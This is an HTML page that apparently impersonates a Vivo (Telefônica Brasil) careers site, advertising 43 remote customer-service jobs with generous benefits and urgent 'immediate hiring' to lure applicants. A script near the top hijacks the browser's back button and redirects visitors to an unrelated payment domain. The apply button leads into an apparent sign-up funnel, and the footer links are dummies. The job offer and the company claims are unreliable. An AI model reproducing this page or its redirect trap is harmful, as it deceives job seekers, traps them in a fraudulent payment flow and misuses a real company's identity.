<html lang="pt-BR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    

<script async="" defer="" src="js/pixel.js"></script>

<script async="" src="js_1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5GMZ53253L');
</script>
    
    <script type="text/javascript">
        (function(c,l,a,r,i,t,y){
            c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
            t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
            y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
        })(window, document, "clarity", "script", "r7dfa6ijq3");
    </script>
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Vagas Home Office - Vivo</title>
    
    <!-- Bootstrap CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    
    <!-- Font Awesome -->
    <link rel="stylesheet" href="css/all.min.css">
    
    <!-- Vivo Fonts -->
    <style>
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeRegular.woff2') format('woff2');
            font-weight: normal;
            font-style: normal;
            font-display: swap;
        }
        
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeBold.woff2') format('woff2');
            font-weight: bold;
            font-style: normal;
            font-display: swap;
        }
        
        @font-face {
            font-family: 'VivoType';
            src: url('fonts/VivoTypeLight.woff2') format('woff2');
            font-weight: 300;
            font-style: normal;
            font-display: swap;
        }
    </style>
    
    <!-- Fallback Google Fonts -->
    <style type="text/css">@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:300;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:400;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:600;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/greek-ext/wght/normal.woff2);unicode-range:U+1F00-1FFF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/hebrew/wght/normal.woff2);unicode-range:U+0590-05FF,U+200C-2010,U+20AA,U+25CC,U+FB1D-FB4F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/latin-ext/wght/normal.woff2);unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic-ext/wght/normal.woff2);unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/latin/wght/normal.woff2);unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/greek/wght/normal.woff2);unicode-range:U+0370-03FF;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/vietnamese/wght/normal.woff2);unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;font-display:swap;}@font-face {font-family:Open Sans;font-style:normal;font-weight:700;src:url(/cf-fonts/v/open-sans/5.0.20/cyrillic/wght/normal.woff2);unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;font-display:swap;}</style>
    
    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/style.css">
    
    <!-- Favicon -->
    <link rel="shortcut icon" href="images/Vivo-roxo.png" type="image/png">

<script>
  window.pixelId = "6800b134ebd4fe5c54b14d47";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s){
    if(f.fbq)return;n=f.fbq=function(){
      n.callMethod?
        n.callMethod.apply(n,arguments):n.queue.push(arguments)
    };
    if(!f._fbq)f._fbq=n;
    n.push=n;
    n.loaded=!0;
    n.version='2.0';
    n.queue=[];
    t=b.createElement(e);t.async=!0;
    t.src=v;
    s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)
  }(
    window,
    document,
    'script',
    'https://connect.facebook.net/en_US/fbevents.js'
  );
  fbq('init', '598153602790130');
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=598153602790130&ev=PageView&noscript=1"
  />
</noscript>
<!-- End Facebook Pixel Code -->



</head>
<script>
  // URL para onde o lead será redirecionado
  const backUrl = "https://pay.cadastroaoaplicativo.online/backredirect/back1";

  // Impede que o usuário retorne para a página anterior
  history.pushState(null, null, location.href);

  window.addEventListener("popstate", function () {
    location.href = backUrl;
  });
</script>
<body style="cursor: auto;">
    <!-- Header -->
    <header class="vivo-header">
        <div class="container">
            <div class="row align-items-center py-3">
                <div class="col-6">
                    <img src="images/Vivo-roxo.png" alt="Vivo" class="vivo-logo">
                </div>
                
            </div>
        </div>
    </header>

    <!-- Breadcrumbs -->
    <div class="container py-1" style="border-bottom: 1px solid #eee;">
        <div>
            <span style="font-size: 11px; color: #888;">TRABALHE CONOSCO > HOME OFFICE</span>
        </div>
    </div>
    
    <!-- Banner -->
    <div class="container-fluid p-0 mb-4 mt-3">
        <img src="images/vivo-carreiras-2210-1920x422.jpg" alt="Vivo Banner" style="width: 100%; height: auto;">
    </div>

    <!-- Main Content -->
    <main class="container my-4">
        <div class="row">
            <div class="col-lg-8 mx-auto">
                <h2 class="vivo-title mb-3" style="font-size: 28px;">Vagas Home Office Vivo</h2>

                <p style="font-size: 15px; color: #666666;">A Vivo, maior empresa de telecomunicações do Brasil, está com <strong>43 vagas abertas</strong> para trabalho remoto na área de atendimento ao cliente. Esta é uma oportunidade única para você trabalhar de casa com carteira assinada e todos os benefícios de uma grande empresa.</p>
                
                <p style="font-size: 15px; color: #660099;"><strong>Contratação imediata após aprovação no processo seletivo simplificado! Não é necessária experiência prévia.</strong></p>
                
                <div class="benefits-details p-3 mb-4 mx-2 bg-light" style="border-radius: 8px; border: 1px solid #E0E0E0;">
                    <h5 style="color: #660099; margin-bottom: 15px;">Principais Benefícios:</h5>
                    <ul class="ps-4">
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Plano Vivo Pós 58GB</strong> - Totalmente gratuito, com ligações ilimitadas e SMS</li>
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Vale Alimentação</strong> - R$ 1.236,00 mensais</li>
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Vale Saúde Vivo</strong> - Plano de saúde completo com cobertura nacional</li>
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Auxílio Creche</strong> - R$ 245,00 por filho com até 6 anos de idade</li>
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Diária Especial</strong> - R$ 178,40 para trabalho aos fins de semana e feriados (opcional)</li>
                        <li style="font-size: 15px; margin-bottom: 8px;"><strong>Auxílio Home Office</strong> - R$ 120,00 mensais para internet</li>
                    </ul>
                </div>
                
                <p style="font-size: 15px; color: #666666;">Trabalhe de segunda a sexta ou escolha adicionar fins de semana para aumentar sua remuneração. Nosso modelo de contratação permite que você defina seu próprio ritmo, com jornada de 6 horas diárias (180h mensais).</p>
                
                <div class="mb-4 mx-2 p-3" style="background-color: #F0F9FF; border-radius: 8px; border: 1px solid #D1E9FF;">
                    <div class="row">
                        <div class="col-md-4">
                            <p class="mb-1" style="font-size: 15px;"><strong>Salário Base:</strong> R$ 1.788,60</p>
                        </div>
                        <div class="col-md-4">
                            <p class="mb-1" style="font-size: 15px;"><strong>Jornada:</strong> 6h/dia (180h mensais)</p>
                        </div>
                        <div class="col-md-4">
                            <p class="mb-1" style="font-size: 15px;"><strong>Vagas:</strong> 43 em todo Brasil</p>
                        </div>
                    </div>
                </div>
                
                <div class="mt-4">
                    <div style="background-color: #EFEDFE; border-radius: 8px; padding: 20px; margin: 0 auto 20px; max-width: 600px; border: 1px solid #d8d4fa;">
                        <h5 style="color: #660099; font-weight: 600; margin-bottom: 15px; font-size: 18px;">Por que trabalhar na Vivo?</h5>
                        <ol style="padding-left: 20px; margin-bottom: 15px; color: #333;">
                            <li><strong>Ambiente flexível e remoto</strong> - trabalhe do conforto da sua casa</li>
                            <li><strong>Pacote de benefícios completo</strong> - plano de saúde, VA e celular grátis</li>
                            <li><strong>Possibilidade de crescimento</strong> - plano de carreira estruturado</li>
                        </ol>
                        <p style="font-size: 13px; color: #444; margin-bottom: 15px;">
                            <i class="fas fa-info-circle me-1" style="color: #660099;"></i> Esta é uma oportunidade por tempo limitado. Temos <strong>43 vagas</strong> para preenchimento imediato para atender a demanda crescente de nossos clientes.
                        </p>
                        <div class="d-flex justify-content-center">
                            <a href="carregando_cadastro/" class="btn vivo-btn px-5" style="width: 100%; max-width: 280px;">
                                CANDIDATAR-SE AGORA
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>

    <!-- Footer -->
    <footer class="py-4 mt-5" style="background-color: #660099; color: white;">
        <div class="container">
            <div class="row">
                <div class="col-md-3 mb-4 mb-md-0">
                    <h5 class="mb-3">Produtos e Serviços</h5>
                    <ul class="list-unstyled">
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Planos Móveis</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Internet Fixa</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">TV</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Combo Vivo</a></li>
                        <li><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Vivo App</a></li>
                    </ul>
                </div>
                <div class="col-md-3 mb-4 mb-md-0">
                    <h5 class="mb-3">Suporte</h5>
                    <ul class="list-unstyled">
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Minha Vivo</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">2ª Via de Conta</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Cobertura</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Desbloqueio</a></li>
                        <li><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Fale Conosco</a></li>
                    </ul>
                </div>
                <div class="col-md-3 mb-4 mb-md-0">
                    <h5 class="mb-3">Institucional</h5>
                    <ul class="list-unstyled">
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Sobre a Vivo</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Sustentabilidade</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Trabalhe Conosco</a></li>
                        <li class="mb-2"><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Para Empresas</a></li>
                        <li><a href="index-1.htm?acesso=autorizado#" class="text-white text-decoration-none">Privacidade</a></li>
                    </ul>
                </div>
                <div class="col-md-3">
                    <h5 class="mb-3">Redes Sociais</h5>
                    <div class="d-flex mb-4">
                        <a href="index-1.htm?acesso=autorizado#" class="text-white me-3"><i class="fab fa-facebook-f"></i></a>
                        <a href="index-1.htm?acesso=autorizado#" class="text-white me-3"><i class="fab fa-twitter"></i></a>
                        <a href="index-1.htm?acesso=autorizado#" class="text-white me-3"><i class="fab fa-instagram"></i></a>
                        <a href="index-1.htm?acesso=autorizado#" class="text-white me-3"><i class="fab fa-youtube"></i></a>
                        <a href="index-1.htm?acesso=autorizado#" class="text-white"><i class="fab fa-linkedin-in"></i></a>
                    </div>
                    <h5 class="mb-3">Baixe o App</h5>
                    <div class="d-flex">
                        <a href="index-1.htm?acesso=autorizado#" class="text-white me-3"><i class="fab fa-app-store-ios"></i> App Store</a>
                        <a href="index-1.htm?acesso=autorizado#" class="text-white"><i class="fab fa-google-play"></i> Google Play</a>
                    </div>
                </div>
            </div>
            <hr class="my-4" style="border-color: rgba(255,255,255,0.2);">
            <div class="row">
                <div class="col-12 text-center text-white-50 small">
                    <p class="mb-1">© 2025 Telefônica Brasil S.A. Todos os direitos reservados.</p>
                    <p class="mb-0">CNPJ: 02.558.157/0001-62 | Endereço: Av. Eng. Luiz Carlos Berrini, 1376 - São Paulo - SP - 04571-936</p>
                </div>
            </div>
        </div>
    </footer>
            
    <!-- Bootstrap, jQuery e Popper.js -->
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body></html>